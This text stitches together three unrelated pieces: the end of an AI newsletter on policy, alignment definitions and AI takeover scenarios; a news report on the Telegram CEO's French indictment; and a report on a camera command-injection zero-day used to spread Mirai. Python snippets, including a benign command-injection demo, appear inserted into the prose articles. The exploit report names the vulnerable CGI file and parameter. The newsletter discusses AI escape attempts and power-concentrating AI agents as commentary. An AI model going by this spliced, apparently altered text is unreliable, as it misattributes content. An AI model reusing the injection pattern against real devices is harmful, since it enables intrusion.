What to think about that scenario? One could argue it is totally fine. You don’t have to engage, the content is lousy compared to what I’d ever tolerate but not obviously below average, and the bug is actively helpful.

Roon: Do not become a machine. There is a machine that will be a better machine than you.

Don’t use high degrees of skill and intelligence in pursuit of simple algorithms.

Simple things done well, ultimately mostly via simple algorithms, is the best way to do far more things than you would think. Figuring out the right algorithms, and when to apply them, is not so simple.

Meanwhile, Roon’s advice is going to become increasingly difficult to follow, as what counts as a machine expands – it’s the same pattern I’ve been predicting the whole time. Life gets better as we all do non-machine things… until the machine can do all the things. Then what?

How do you prepare a college education so that it complements AI, rather than restricting AI use or defaulting to uncreative use and building the wrong skills? The problem statement was strong, pointing out the danger of banning LLMs and falling behind on skills. But then it seemed like it asked all the wrong questions, confusing the problems of academia with the need to prepare students for the future, and treating academic skills as ends in themselves, and focusing on not ‘letting assignments be outsmarted by’ LLMs. The real question is, what will students do in the future, and what skills will they need and how do they get them?

DARPA launches regional tech accelerators.

Dwarkesh Patel hiring for an ‘everything’ role, in person in San Francisco.

A job opening with the EU AI Office, except it’s in San Francisco.

Gemini Pro 1.5 and Gemini Flash got some upgrades in AI Studio, and they’re trying out a new Gemini Flash 1.5-8B. Pro is claimed to be stronger on coding and complex prompts, the new full size Flash is supposed to be better across the board.

They are also giving the public a look at Gems, which are customized modes for Gemini, intuitively similar to GPTs for ChatGPT. I set one up early on, the Capitalization Fixer, to properly format Tweets and other things I am quoting, which worked very well on the first try, and I keep meaning to experiment more.

Arena scores have improved for both models, very slightly for Pro (it’s still #2) and a lot for Flash which is now tied with Claude Sonnet 3.5 (!).

Sully is impressed with the new Flash, saying Google cooked, it is significantly smarter and less error prone, and it actually might be comparable to Sonnet for long context and accuracy, although not coding. Bodes very well for the Pixel 9 and Google’s new assistant.

Anthropic offers a prompt engineering course. I could definitely get substantially better responses with more time investment, and so could most everyone else. But I notice that I’m almost never tempted to try. Probably a mistake, at least to some extent, because it helps one skill up.

Grey Swan announces $40,000 in bounties for single-turn jailbreaking, September 7 at 10am Pacific. There will be 25 anonymized models and participants need to get them to do one of 8 standard issue harmful requests.

Profound, which is AI-SEO, as in optimization for AI search. How do you get LLMs to notice your brand? They claim to be able to offer assistance.

Official page listing the system prompts for all Anthropic’s models, and when they were last updated.

U.S. AI Safety Institute Signs Agreements Regarding AI Safety Research, Testing and Evaluation With Anthropic and OpenAI, enabling formal research collaboration. AISI will get access to major new models from each company prior to and following their public release.

This was something that the companies had previously made voluntary commitments to do, but had not actually done. It is a great relief that this has now been formalized. OpenAI and Anthropic have done an important good thing.

I call upon all remaining frontier model labs (at minimum Google, Meta and xAI) to follow suit. This is indeed the least you can do, to give our best experts an advance look to see if they find something alarming. We should not have to be mandating this.

More related excellent news (given Strawberry exists): OpenAI demos unreleased Strawberry reasoning AI to U.S. national security officials, which has supposedly been used to then develop something called Orion. Hopefully this becomes standard procedure.

In a survey for Scott Alexander, readers dramatically underestimated the importance of public policy relative to other options, but I think this was due to scope insensitivity bias from the framing rather than an actual underestimation? There’s some good discussion there.

The full survey results report is here.

OpenAI in talks for funding round valuing it above $100 billion.

According to Daniel Kokotajlo, nearly half of all AI safety researchers at OpenAI have now left the company, including previously unreported Jan Hendrik Kirchner, Collin Burns, Jeffrey Wu, Jonathan Uesato, Steven Bills, Yuri Burda, and Todor Markov.

Ross Anderson in The Atlantic asks, did ‘the doomers’ waste ‘their moment’ after ChatGPT, now that it ‘has passed’? The air quotes tell you I do not buy this narrative. Certainly the moment could have been handled better, but I would say the discourse has still gone much better than I would have expected. It makes sense that Yudkowsky is despairing, because his bar for anything being useful at helping us actually not die is very high, so to him even a remarkably good result is still not good enough.

I would instead say that AI skepticism is ‘having a moment.’ The biggest update this past 18 months was not the things Anderson says were learned in the last year; those, everyone pretty much assumed back in 2016, and I was in the rooms where those assumptions were made explicit.

Instead, the biggest update was that once a year passed and the entire world didn’t transform and the AIs didn’t get sufficiently dramatically better despite there being a standard 3-year product cycle, everyone managed to give up what situational awareness they had. So now we have to wait until GPT-5, or another 5-level model, comes online, and we do this again.

Meanwhile, so many people are disappointed by models not seeing dramatic top-level capability enhancements in the 18 months since GPT-4 (2 years if you count from when it finished training), saying we aren’t making progress?

In addition to the modest but real improvements – Claude Sonnet 3.5, GPT-4-Turbo and Gemini Pro 1.5 really are better than GPT-4-original, and also can do long documents and go multimodal and so on – the cost of that level of intelligence dropped rather dramatically.

Elad Gil: From @davidtsong on my team

Cost of 1M tokens has dropped from $180 to $0.75 in ~18 months (240X cheaper!)

You can do a lot at $0.75 that you can’t do at $180, or even can’t do at $7.50.
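The price figures come from the quoted tweet; the task size below (summarizing a 100k-token document) is my own illustrative example of what a 240x drop unlocks.

```python
# The quoted cost drop: ~$180 -> ~$0.75 per 1M tokens in ~18 months.
OLD_PRICE_PER_M = 180.00   # dollars per 1M tokens, early GPT-4 era (per tweet)
NEW_PRICE_PER_M = 0.75     # dollars per 1M tokens today (per tweet)

def cost(tokens: int, price_per_million: float) -> float:
    """Dollar cost to process a given number of tokens."""
    return tokens / 1_000_000 * price_per_million

reduction = OLD_PRICE_PER_M / NEW_PRICE_PER_M   # 240x

# Summarizing a 100k-token document (illustrative task size):
old = cost(100_000, OLD_PRICE_PER_M)   # $18.00: too pricey to do casually
new = cost(100_000, NEW_PRICE_PER_M)   # about 8 cents: cheap enough for bulk use
print(f"{reduction:.0f}x cheaper: ${old:.2f} -> ${new:.4f}")
```

At the old price, running that summary over a million documents costs $18 million; at the new price, $75,000. Entire categories of use only make sense at the bottom of that curve.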

Imagine if any other product, in any other industry, only showed this level of progress within 18 months. All it did was get modestly better, add various modalities and features, oh and drop in price by two orders of magnitude.

Gwern enters strongly on the side that you should want your content to be scraped and incorporated into LLMs, going so far as to say this is a lot of the value of writing.

Gwern: This is one of my beliefs: there has never been a more vital hinge-y time to write, it’s just that the threats are upfront and the payoff delayed, and so short-sighted or risk-averse people are increasingly opting-out and going dark.

If you write, you should think about what you are writing, and ask yourself, “is this useful for an LLM to learn?” and “if I knew for sure that a LLM could write or do this thing in 4 years, would I still be doing it now?”

Four years is a long time. Very little writing is still used after four years. That long tail does represent a lot of the value, but also the ones that would have survived are presumably the ones most important to feed into future LLMs.

Roon continues to explain for those with ears to listen, second paragraph in particular.

Roon: The truth for most of the computer age is that it required new entrants to use the technology and disrupt their older competitors who had to be dragged into modernity kicking and screaming and sometimes altogether killed, rather than a pleasant learning and diffusion process.

The difference with AI is that there *may not* be a meaningful difference in intelligence between an AI that can program super well and one that can redesign workflows and one that can start businesses.

I would place all my bets on AIs continually becoming smarter and more autonomous rather than incumbents learning to use new tools or even startups disrupting them.

Unless capabilities progress stalls or we redirect events, which the labs do not expect, it (by which we will rapidly mean Earth) will all mostly be about the AIs and their capabilities and intelligence.

Buck Shlegeris gives us a badly needed reality check on those who think that if there was a real threat, then everyone would respond wisely and slow down or pause. Even if we did see frontier models powerful enough to pose existential threats, and one of them very clearly tried to backdoor into critical services or otherwise start what could be an escape or takeover attempt, and the lab in question was loud about it, what would actually happen?

I think Buck is basically correct that everyone involved would basically say (my words here) ‘stupid Acme Labs with their bad alignment policies messed up, we’ll keep an eye out for that and they can shut down if they want but that’s not our fault, and if we stop then China wins.’

It matches what we have seen so far. Over and over we get slightly more obvious fire alarms about what is going to happen. Often they almost seem like they were scripted, because they’re so obvious and on the nose. It doesn’t seem to change anything.

One obvious next move here is to ask labs like OpenAI, Google and Anthropic: What are the conditions under which, if another lab reported a given set of behaviors, you would take that as a true fire alarm, and what would you then do about it? How does this fit into your Safety and Security Protocol (SSP)?

If the answer is ‘it doesn’t, that’s their model not ours, we will watch out for ours,’ then you can make a case for that, but it should be stated openly in advance.

What would automated R&D look like? Epoch AI reports on some speculations.

Epoch AI: Automating AI research could rapidly drive innovation. But which research tasks are nearing automation? And how can we evaluate AI progress on these?

To answer these questions, we interviewed eight AI researchers about their work, their predictions of automation, and how to evaluate AI R&D capabilities.

The survey participants described research as a feedback loop with four phases: creating hypotheses, designing experiments, running experiments, and analyzing results. This closely matched pre-existing research on AI evaluations, e.g. MLAgentBench.

Creating hypotheses. Participants predict high-level hypothesis planning will be tough to automate due to the need for deep reasoning and original thinking.

To assess AI’s skill in high-level planning, participants proposed evaluating its ability to tackle open-ended research problems. For detailed planning, they recommended an evaluation based on how well the AI iterates in response to experimental results.

Designing experiments. Researchers predicted engineering to design experiments would be easier to automate than planning, and will drive most R&D automation in the next five years. Specific predictions ranged widely, from improved assistants to autonomous engineering agents.

Participants thought existing AI evaluations were promising for prototype engineering and debugging. They emphasized the importance of measuring reliability, and selecting realistic, difficult examples.

Running experiments. Participants with experience in LLM pretraining noted that much of their work involved setting up training jobs, monitoring them, and resolving issues.

Monitoring training could be particularly amenable to automation. To evaluate progress here, researchers suggested testing AI against examples of failed and successful training runs.

Analyzing results is the final phase, relating experimental results back to high-level and low-level plans. Researchers expected analysis would be hard to automate.

We can evaluate analysis by, for example, testing AI’s ability to predict the results of ML experiments.

Takeaways: researchers see engineering tasks as crucial for automating AI R&D, and expect progress automating these. They predict AI that could solve existing engineering-focused evaluations would significantly accelerate their work.

This work was funded by the UK AI Safety Institute (@AISafetyInst) to build the evidence base on AI’s contribution to AI research and development. We thank AISI for their support and input in this project.

Full report is here.

Looking at the full report I very much got an ‘AI will be about what it is now, or maybe one iteration beyond that’ vibe. I also got a ‘we will do what we are doing now, only we will try to automate steps where we can’ vibe, rather than a ‘think about what the AI enables us to do now or do differently’ vibe.

Thus, this all feels like a big underestimate of what we should expect. That does not mean progress goes exponential, because difficulty could also greatly increase, but it seems like even the engineers working on AI are prone to more modest versions of the same failure modes that get economists to estimate single-digit GDP growth from AI within a decade.

It is one thing to shout from the rooftops ‘the singularity is near!’ and that we are all on track to probably die, and have people not appreciate that. I get that. It hits different when you say ‘I think that the amazing knows-everything does-everything machine might add to GDP’ or ‘I think this might speed up your work’ and people keep saying no.

SB 1047 has passed the Assembly, by a wide majority.

Final vote was 48-16, with 15 not voting, per this tally.

Here’s an earlier tally missing a few votes:

Democrats voted overwhelmingly for it, 39-1 on the earlier tally. Worryingly, Republicans voted against it, 2-8 in that tally.

There is also a ‘never vote no’ caucus. So it is unclear to what extent those not voting are effectively voting no, versus actually not voting. It does seem like a veto override remains extremely unlikely. In some sense it was 46 Yes votes and 11 No votes, in another it was 46 votes Yes, 33 votes Not Yes.

It is now up to Governor Gavin Newsom whether it becomes law. It’s a toss up.

My bar for future coverage has gone up. I’ve offered a Guide to SB 1047, and a roundup of who supports and opposes.

This section ties up some extra loose ends, to illustrate how vile much of the opposition has been acting, both to know it now and to remember it going forward.

For the record, if anyone ever says something is a push poll or attempt to get the answer you want, compare it to this, because this is an actual push poll and attempt to get the answer you want.

Yes, bill opponents have been systematically lying their asses off, but this takes the cake. I mean wow, I’m not mad I am only impressed, this is from the Chamber of Commerce and it made it into Politico.

The fact check: This is mostly flat out lies, but let’s be precise.

  1. SB 1047 would not create a new regulatory agency

  2. SB 1047 would not determine how AI models can be developed

  3. SB 1047 would not impact ‘small startup companies’ in any direct way; there is no way they can ever be fined or given any orders.

  4. SB 1047 does not involve ‘orders from bureaucrats.’ It does involve issuing guidance, if you want to claim that is the same thing.

  5. I can confirm some do indeed say that SB 1047 would potentially lead companies to move out of the state of California. So this one is technically true.

Now, by contrast, here is the old poll people were saying was so unfair:

I trust you can spot the difference.

Shame on the Chamber of Commerce. Shame on Politico.

For those who don’t realize, the opposition that yells about the funding sources of those worried about AI is almost never organic and is mostly deeply conflicted. Example number a lot: Loquacious Bibliophilia points out that Nirit Weiss-Blatt is one of those advocating strongly against SB 1047 specifically, and against those worried about AI in general, while claiming to be independent. She frequently makes the argument that the worried are compromised by their funding sources and are therefore acting in bad faith as part of some plot, and runs ‘follow the money’ and guilt-by-association and ad hominem arguments on the regular. By those same standards (and standard journalistic ethical principles) she is deeply conflicted in terms of her funding sources, while representing otherwise.

My guess is she thinks (and is not alone in thinking) This Is Fine, and good even, based on a philosophy that industry funding is enlightened self-interest and good legitimate business (that isn’t corruption, that’s America), whereas altruistic funding and trying to do things for other reasons is automatically a sinister plot.

I am most definitely not one of those who makes the opposite mistake. Business is great. I love me some doing business. Nothing wrong with advocating for things good for your business. But it’s important to understand that this playbook is a key part of the plan to attempt to permanently discredit the very idea that AI might be dangerous.

Garry Tan says there was the threat a year ago that there would be AGI and ASI, because one model might ‘run away with it,’ but now that it’s been a year and several models are competitive, that danger has passed? How does value accrue to foundation models rather than flowing to other companies?

Honestly, it’s heartbreaking to listen to, as you realize Garry Tan can’t fathom the concept of ASI at all, or why anyone would worry about it, other than that someone else might get to ASI first – but if it’s ‘competitive’ between companies then how will these superintelligences capture the surplus? It’s all hype and startups and VC and business, no stopping to actually think about the world.

And it’s so bizarre to hear, time and again, from people who claim to be tech experts who know tech experts and to have long time horizons, essentially the model of ‘well we expected big things from AI, but it’s been a year and all we had was a 10x cost reduction and speed improvement and the best models are only somewhat better, so I guess it’s an ordinary tech and we should do ordinary tech things and think about the right hype level.’ Seriously, what the hell? In Garry’s particular case I’d perhaps recommend talking more about this with Paul Graham, as a first step? Paul Graham doesn’t ‘fully get it’ but he does get it.

Figure CEO Brett Adcock says their humanoid robots are being manufactured, with rapid improvements all around, and soon will be able to go out and make you money or save you time by doing your job. How many will you want, if it could make you money?

The correct answer, of course, if they can actually do this, is ‘all of them, as many as you can make, and then I set them to work making more robots.’ That’s how capitalism rolls, yo, until they can no longer make their owners money.

Tsarathustra: Pedro Domingos says the legal obligation of an AI should be to maximize the value function of the person it represents, and the goal of an AI President should be to maximize the collective value function of everybody.

He bites the full bullet and says ‘AI should not be regulated at all,’ that digital minds smarter than us should be the one special exception to the regulations we impose on everything else in existence.

I thank him for coming out and saying ‘no regulation of any kind, period’ rather than pretending he wants some mysterious other future regulation, give me regulation, just do not give it yet. If you believe that, if you want that, then yes, please say that, and also Speak Directly Into This Microphone.

That said, can we all agree that this is a Can’t Happen short of an AI company taking over, that it is not the default of common law, and also that this proposal is rather batcrazy?

Also, if we want to actually analyze what those legal rules would mean in practice, let’s notice that it absolutely involves loss of human control over the future, even if it goes maximally well. That’s the goddamn plan. Everyone has an AI maximizing for them, and the President is an AI doing other maximization, all for utility functions? Do you think you get to take that decision back? Do you think you have any choices? Do you think that will be air you’re breathing?

Indeed, what is the first thing that the AI president, whose job is collective utility maximization, is going to do? It’s going to do whatever it takes to concentrate its power, and to gain full control over all the other AIs also trying to gain full control for the same reason (and technically the humans if they somehow still matter), so it can then use all the resources and rearrange all the atoms to whatever configuration maximizes its utility function that we hope maximizes ours somehow. Or they will all figure out how to make a deal and work together, with the same result. And almost always this will be some strange out-of-distribution world we very much wouldn’t like on past reflection, and no all of your ‘obvious’ solutions to that or reasons why ‘it won’t be that stupid’ or whatever won’t work for reasons MIRI people keep explaining over and over.

This is all very 101 stuff, we knew all this in 2009, no nothing about LLMs changes any of the logic here if the AIs are sufficiently capable, other than to make any solutions even more impossible to implement.

Eliezer Yudkowsky tries to explain that the actual human preferences are very difficult for outsiders to have predicted from first principles, and that we should expect similarly bizarre and hard to predict outcomes from black-box optimizations. Seemed worth reproducing in full.

Eliezer Yudkowsky:

The most reasonable guess by a true Outsider for which taste a biological organism would most enjoy, given the training cases for biology, would be “gasoline”. Gasoline has very high chemical potential energy; and chemical energy is what biological organisms use, and what would correlate with reproductive success… right?

If you’d never seen the actual results, “biological organisms will love the taste of gasoline” would sound totally reasonable to you, as a guess about the result of evolution. There’s a sense in which it is among the most likely guesses.

It’s just that, on hard prediction problems, the most likely guess ends up still not being very likely.

Actually, humans ended up enjoying ice cream.

You say ice cream has got higher sugar, salt, and fat than anything found in the ancestral environment? You say an Outsider should’ve been able to call that new maximum, once the humans invented technology and started picking their optimal tastes from a wider set of options?

Well, first of all, good luck to a true Outsider trying to guess in advance that the particular organic chemical classes of “sugars” and “fats” and the particular compound “sodium chloride”, would end up being the exact chemicals that taste buds would detect. Sure, in retrospect, there’s a sensible story about how it happened — about how those ended up being used as common energy-storage molecules by common things humans ate. Could you predict that outcome in advance, without seeing the final results? Good luck with that.

But more than that — “honey and salt poured over bear fat” would actually have more sugar, salt, and fat than ice cream! “Honey and salt poured over bear fat” would also more closely resemble what was found in the ancestral environment. It’s a more reasonable-sounding-in-advance guess for the ideal human meal than what actually happened! Things that more closely resemble ancestral foods would more highly concentrate the advance-prediction probability density for what humans would most enjoy eating! It’s just that, on hard prediction problems, the most likely guess is still not very likely.

Instead, the actual max-out stimulus for human taste buds (at 1920s tech levels) is “frozen ice cream”. Not honey and salt poured over bear fat. Not even melted ice cream. Frozen ice cream specifically!

In real life, there’s just no reasonable way for a non-superintelligent Outsider to call a shot like that, in advance of seeing the results.

The lesson being: Black-box optimization on an outer loss criterion and training set, produces internal preferences such that, when the agent later grows in capabilities and those internal preferences are optimized over a wider option space than in the training set, the relationship of the new maxima to the historical training cases and outer loss is complicated, illegible, and pragmatically impossible to predict in advance.

Or in English: The outcomes that AIs most prefer later, when they are superintelligent, will not bear any straightforward resemblance to the cases you trained them on as babies.

In the unlikely event that we were still alive after the ignition of an artificial superintelligence — then in retrospect, we could look back and figure out some particular complicated relationship that ASI’s internal preferences ended up bearing to the outer training cases. There will end up being a reasonable story, in retrospect, about how that particular outcome ended up being what the ASI most wanted. But not in any way you could realistically call in advance; and that means, not in any way the would-be owners of artificial gods could control in advance by crafty selection of training cases and an outer loss function.

Or in English: You cannot usefully control what superintelligences end up wanting later by controlling their training data and loss functions as adolescents.
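The claim about new maxima can be made concrete with a deliberately silly numerical sketch (my own toy illustration with made-up numbers, not anything from the original argument): fit a proxy preference on a narrow training range, then optimize it over a wider option space, and watch the new maximum land somewhere the outer criterion never endorsed.

```python
def true_reward(x):
    # The "outer loss" used during training: peaks at x = 1, falls off after.
    return x * (2 - x)

# Training options only span [0, 1]. On that range, the simple internal
# preference "bigger x is better" orders every pair exactly as the outer
# criterion does -- the proxy looks perfectly aligned in training.
train = [i / 10 for i in range(11)]
proxy = lambda x: x

agrees_in_training = all(
    (proxy(a) < proxy(b)) == (true_reward(a) < true_reward(b))
    for a, b in zip(train, train[1:])
)

# Later the option space widens to [0, 3]. The proxy's maximum shoots off
# to the boundary, nowhere near the outer criterion's maximum.
wide = [i / 10 for i in range(31)]
proxy_best = max(wide, key=proxy)        # 3.0
true_best = max(wide, key=true_reward)   # 1.0
```

The proxy matched the training signal perfectly on-distribution, and its off-distribution maximum was still nothing the training signal would have picked.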

A flashback to June 2023, when Marc Andreessen put out his rather extreme manifesto: this is Roon responding to Dwarkesh’s response to it.

Definitely one of those ‘has it really been over a year?’ moments.

Roon: I don’t agree with everything here but it’s very strange to hear pmarca talk about how AI will change everything by doing complex cognitive tasks for us, potentially requiring significant autonomy and creativity, but then turn around and say it’s mindless and can never hurt us. To me this is an AI pessimist position, from someone who doesn’t believe in the real promise of it.

We’ve been saying versions of this a lot, but perhaps this is Roon saying it best?

It is absurd to think that AI will create wonders beyond our dreams and solve our problems, especially via doing complex cognitive tasks requiring autonomy and creativity, and also think it will forever be, as the Hitchhiker’s Guide to the Galaxy has said about Earth, Harmless or Mostly Harmless. It’s one or the other.

When people say that AI won’t be dangerous, they are saying they don’t believe in AI, in the sense of not thinking AI will be much more capable than it is today.

Which is an entirely reasonable thing to predict. I can’t rule it out. But if you do that, you have to own that prediction, and act as if its consequences are probably true.

Or, of course, they are engaged in vibe-based Obvious Nonsense to talk up their portfolio and social position, and believe only in things like profits, hype, fraud and going with the flow. That everything everywhere always has been and will be a con. There’s that option.

What even is alignment research? It’s tricky. Richard Ngo tries to define it, and here offers a full post.

Richard Ngo: One difficulty in building the field of AI alignment is that there’s no good definition for what counts as “alignment research”.

The definition I’ve settled on: it’s research that focuses *either* on worst-case misbehavior *or* on the science of AI cognition.

A common (implicit) definition is “whatever research helps us make AIs more aligned”. But great fundamental research tends to have wide-ranging, hard-to-predict impacts, and so in practice this definition tends to collapse to “research by people who care about reducing xrisk”.

I don’t think there’s a fully principled alternative. But heuristics based on the research itself seem healthier than heuristics based on the social ties + motivations of the researchers. Hence the two heuristics from my original tweet: worst-case focus and cognitivist science.

Daniel Kokotajlo: I like my own definition of alignment vs. capabilities research better:

“Alignment research is when your research goals are primarily about how to make AIs aligned; capabilities research is when your research goals are primarily about how to make AIs more capable.”

I think it’s very important that lots of people currently doing capabilities research switch to doing alignment research. That is, I think it’s very important that lots of people who are currently waking up every day thinking ‘how can I design a training run that will result in AGI?’ switch to waking up every day thinking ‘Suppose my colleagues do in fact get to AGI in something like the current paradigm, and they apply standard alignment techniques — what would happen? Would it be aligned? How can I improve the odds that it would be aligned?’

Whereas I don’t think it’s particularly important that e.g. people switch from scalable oversight to agent foundations research. (In fact it might even be harmful lol)

As an intuition pump: I notice my functional definition of alignment work is ‘work that differentially helps us discover a path through causal space that could result in AIs that do either exactly what we intend for them to do or things that would have actually good impacts on reflection, and do far less to increase the rate at which we can increase the capabilities of those AIs,’ and then distinguish between ‘mundane alignment’ that does this for current or near systems, and ‘alignment’ (or in my head ‘actual’ or ‘real’ alignment, etc, or OpenAI called a version of this ‘superalignment’) for techniques that could successfully be used to do this with highly capable AIs (e.g. AGI/ASIs) and to navigate the future critical period.

Another good attempt at better definitions.

Roon: Safety is a stopgap for alignment.

Putting AGIs in black boxes and restricted environments and human/machine supervision are conditions you undertake when you haven’t solved alignment.

In the ideal world you trust the agi so completely that you’d rather let it run free and do things beyond your comprehension far beyond your ability to supervise and you feel much safer than if a human was at the helm.

(official view of Roon and nobody else)

I like the central distinction here. Ideally we would use ‘safety’ to mean ‘what we do to get good outcomes given our level of alignment’ and ‘alignment’ to mean ‘get the AIs to do things we would want them to do,’ whether that means intent matching, goal matching, reflective approval matching, or however else you think is wise. Inevitably the word ‘safety’ gets hijacked all the time, and everything is terrible regarding how we talk in public policy debates, but it would be nice.

I also like that this suggests what the endgame might look like. AGIs (and then ASIs) ‘running free,’ doing things we don’t understand, being at the helm. So a future where AIs are in control, and we hope that this results in good outcomes.

The danger is that yes, you feel a lot better with your AI at the helm of your project pursuing your ideals or goals, versus a human doing it, because the AI is vastly more capable on every level, and you would only slow it down. But if everyone does that, what happens? Even if everything goes well on the alignment front, we no longer matter, and the AIs compete against each other, with the most fit surviving, getting copied and gaining resources. I continue to not see how that ends well for us without a lot of additional what we’d here call, well, ‘safety.’

Andrew Chi-Chih Yao, the only Chinese Turing award winner who the Economist says has the ear of the CCP elite, and potentially Xi Jinping? Also Henry Kissinger before his death, from the same source, as an aside.

The Economist: Western accelerationists often argue that competition with Chinese developers, who are uninhibited by strong safeguards, is so fierce that the West cannot afford to slow down. The implication is that the debate in China is one-sided, with accelerationists having the most say over the regulatory environment. In fact, China has its own AI doomers—and they are increasingly influential.

But the accelerationists are getting pushback from a clique of elite scientists with the Communist Party’s ear. Most prominent among them is Andrew Chi-Chih Yao, the only Chinese person to have won the Turing award for advances in computer science. In July Mr Yao said AI poses a greater existential risk to humans than nuclear or biological weapons. Zhang Ya-Qin, the former president of Baidu, a Chinese tech giant, and Xue Lan, the chair of the state’s expert committee on AI governance, also reckon that AI may threaten the human race. Yi Zeng of the Chinese Academy of Sciences believes that AGI models will eventually see humans as humans see ants.

The debate over how to approach the technology has led to a turf war between China’s regulators. The industry ministry has called attention to safety concerns, telling researchers to test models for threats to humans. But most of China’s securocrats see falling behind America as a bigger risk.

The decision will ultimately come down to what Mr Xi thinks. In June he sent a letter to Mr Yao, praising his work on AI. In July, at a meeting of the party’s central committee called the “third plenum”, Mr Xi sent his clearest signal yet that he takes the doomers’ concerns seriously.

They’re also likely going to set up an AI Safety Institute, and we’re the ones who might have ours not cooperate with theirs.

All of that sounds remarkably familiar.

And all of that is in the context where the Chinese are (presumably) assuming that America has no intention of working with them on this.

Pick. Up. The. Phone.

Alas, even lighter than usual, unless you count that SB 1047 “poll.”

AI #79: Ready for Some Football


Telegram CEO charged with numerous crimes and is banned from leaving France

Indictment —

Multi-billionaire must post bail of 5 million euros, report to police twice a week.

Pavel Durov, CEO and co-founder of Telegram, speaks at TechCrunch Disrupt SF 2015 on September 21, 2015, in San Francisco. (Getty Images | Steve Jennings)

Telegram CEO Pavel Durov was indicted in France today and ordered to post bail of 5 million euros. The multi-billionaire was forbidden from leaving the country and must report to police twice a week while the case continues.

Charges were detailed in a statement issued today by Paris prosecutor Laure Beccuau, which was provided to Ars. They are nearly identical to the possible charges released by Beccuau on Monday.

The first charge listed is complicity in “web-mastering an online platform in order to enable an illegal transaction in organized group.” Today’s press release said this charge carries a maximum penalty of 10 years in prison and a 500,000-euro fine.

Telegram’s alleged refusal to cooperate with law enforcement on criminal investigations resulted in a charge of “refusal to communicate, at the request of competent authorities, information or documents necessary for carrying out and operating interceptions allowed by law.”

Beccuau said there was a near-total lack of response from Telegram to requests for cooperation in cases related to crimes against minors, drug crimes, and online hate. This led authorities “to open an investigation into the possible criminal responsibility of the messaging app’s executives in the commission of these offenses,” Beccuau said, as quoted by Bloomberg.

Durov was further charged with complicity in drug trafficking and distribution of child pornography.

Cryptology-related charges

He was also charged with providing cryptology services without making required declarations to government officials. Under French law, providers of cryptology must make declarations to ANSSI, the country’s cybersecurity agency. French authorities may request that companies provide “the technical characteristics and the source code of the means of cryptology which was the subject of the declaration.”

The charges against Durov include “providing cryptology services aiming to ensure confidentiality without certified declaration,” “providing a cryptology tool not solely ensuring authentication or integrity monitoring without prior declaration,” and “importing a cryptology tool ensuring authentication or integrity monitoring without prior declaration.”

Telegram offers a mix of private messaging and social network features. Telegram messages do not have end-to-end encryption by default, but the security feature can be enabled for one-on-one conversations.

In response to Durov’s arrest, Telegram said on Sunday that it follows the law and industry standards on moderation and called it “absurd to claim that a platform or its owner are responsible for abuse of that platform.”

French authorities also reportedly issued a warrant for the arrest of Durov’s brother and fellow Telegram co-founder, Nikolai.



Unpatchable 0-day in surveillance cam is being exploited to install Mirai

MIRAI STRIKES AGAIN —

Vulnerability is easy to exploit and allows attackers to remotely execute commands.


Malicious hackers are exploiting a critical vulnerability in a widely used security camera to spread Mirai, a family of malware that wrangles infected Internet of Things devices into large networks for use in attacks that take down websites and other Internet-connected devices.

The attacks target the AVM1203, a surveillance device from Taiwan-based manufacturer AVTECH, network security provider Akamai said Wednesday. Unknown attackers have been exploiting a 5-year-old vulnerability since March. The zero-day vulnerability, tracked as CVE-2024-7029, is easy to exploit and allows attackers to execute malicious code. The AVM1203 is no longer sold or supported, so no update is available to fix the critical zero-day.

That time a ragtag army shook the Internet

Akamai said that the attackers are exploiting the vulnerability so they can install a variant of Mirai, which arrived in September 2016 when a botnet of infected devices took down cybersecurity news site Krebs on Security. Mirai contained functionality that allowed a ragtag army of compromised webcams, routers, and other types of IoT devices to wage distributed denial-of-service attacks of record-setting sizes. In the weeks that followed, the Mirai botnet delivered similar attacks on Internet service providers and other targets. One such attack, against dynamic domain name provider Dyn, paralyzed vast swaths of the Internet.

Complicating attempts to contain Mirai, its creators released the malware to the public, a move that allowed virtually anyone to create their own botnets that delivered DDoSes of once-unimaginable size.

Kyle Lefton, a security researcher with Akamai’s Security Intelligence and Response Team, said in an email that it has observed the threat actor behind the attacks perform DDoS attacks against “various organizations,” which he didn’t name or describe further. So far, the team hasn’t seen any indication the threat actors are monitoring video feeds or using the infected cameras for other purposes.

Akamai detected the activity using a “honeypot” of devices that mimic the cameras on the open Internet to observe any attacks that target them. The technique doesn’t allow the researchers to measure the botnet’s size. The US Cybersecurity and Infrastructure Security Agency warned of the vulnerability earlier this month.

The technique, however, has allowed Akamai to capture the code used to compromise the devices. It targets a vulnerability that has been known since at least 2019 when exploit code became public. The zero-day resides in the “brightness argument in the ‘action=’ parameter” and allows for command injection, researchers wrote. The zero-day, discovered by Akamai researcher Aline Eliovich, wasn’t formally recognized until this month, with the publishing of CVE-2024-7029.
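The underlying bug class is ordinary OS command injection: a CGI handler splices an unsanitized query parameter into a shell command line. A generic sketch of the pattern and the standard fix, using harmless echo commands and hypothetical parameter handling (this is not AVTECH’s actual code):

```python
import subprocess

def brightness_cmd_vulnerable(value: str) -> str:
    # Anti-pattern: untrusted input interpolated into a shell string.
    return f"echo brightness={value}"

# With a benign stand-in "payload", the shell dutifully runs the
# injected second command as well.
injected = subprocess.run(
    brightness_cmd_vulnerable("5; echo INJECTED"),
    shell=True, capture_output=True, text=True,
).stdout  # "brightness=5\nINJECTED\n"

def brightness_cmd_safe(value: str) -> list:
    # Fix: validate the input, then pass it as a discrete argv element
    # with no shell in the loop.
    if not value.isdigit():
        raise ValueError("brightness must be numeric")
    return ["echo", f"brightness={value}"]

clean = subprocess.run(
    brightness_cmd_safe("5"), capture_output=True, text=True
).stdout  # "brightness=5\n"
```

Against the validated version, the same payload simply raises an error instead of executing.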

Wednesday’s post went on to say:

How does it work?

This vulnerability was originally discovered by examining our honeypot logs. Figure 1 shows the decoded URL for clarity.

Fig. 1: Decoded payload body of the exploit attempts (Akamai)

The vulnerability lies in the brightness function within the file /cgi-bin/supervisor/Factory.cgi (Figure 2).

Fig. 2: PoC of the exploit (Akamai)

What could happen?

In the exploit examples we observed, essentially what happened is this: The exploit of this vulnerability allows an attacker to execute remote code on a target system.

Figure 3 is an example of a threat actor exploiting this flaw to download and run a JavaScript file to fetch and load their main malware payload. Similar to many other botnets, this one is also spreading a variant of Mirai malware to its targets.

Fig. 3: Strings from the JavaScript downloader (Akamai)

In this instance, the botnet is likely using the Corona Mirai variant, which has been referenced by other vendors as early as 2020 in relation to the COVID-19 virus.

Upon execution, the malware connects to a large number of hosts through Telnet on ports 23, 2323, and 37215. It also prints the string “Corona” to the console on an infected host (Figure 4).

Fig. 4: Execution of malware showing output to console (Akamai)

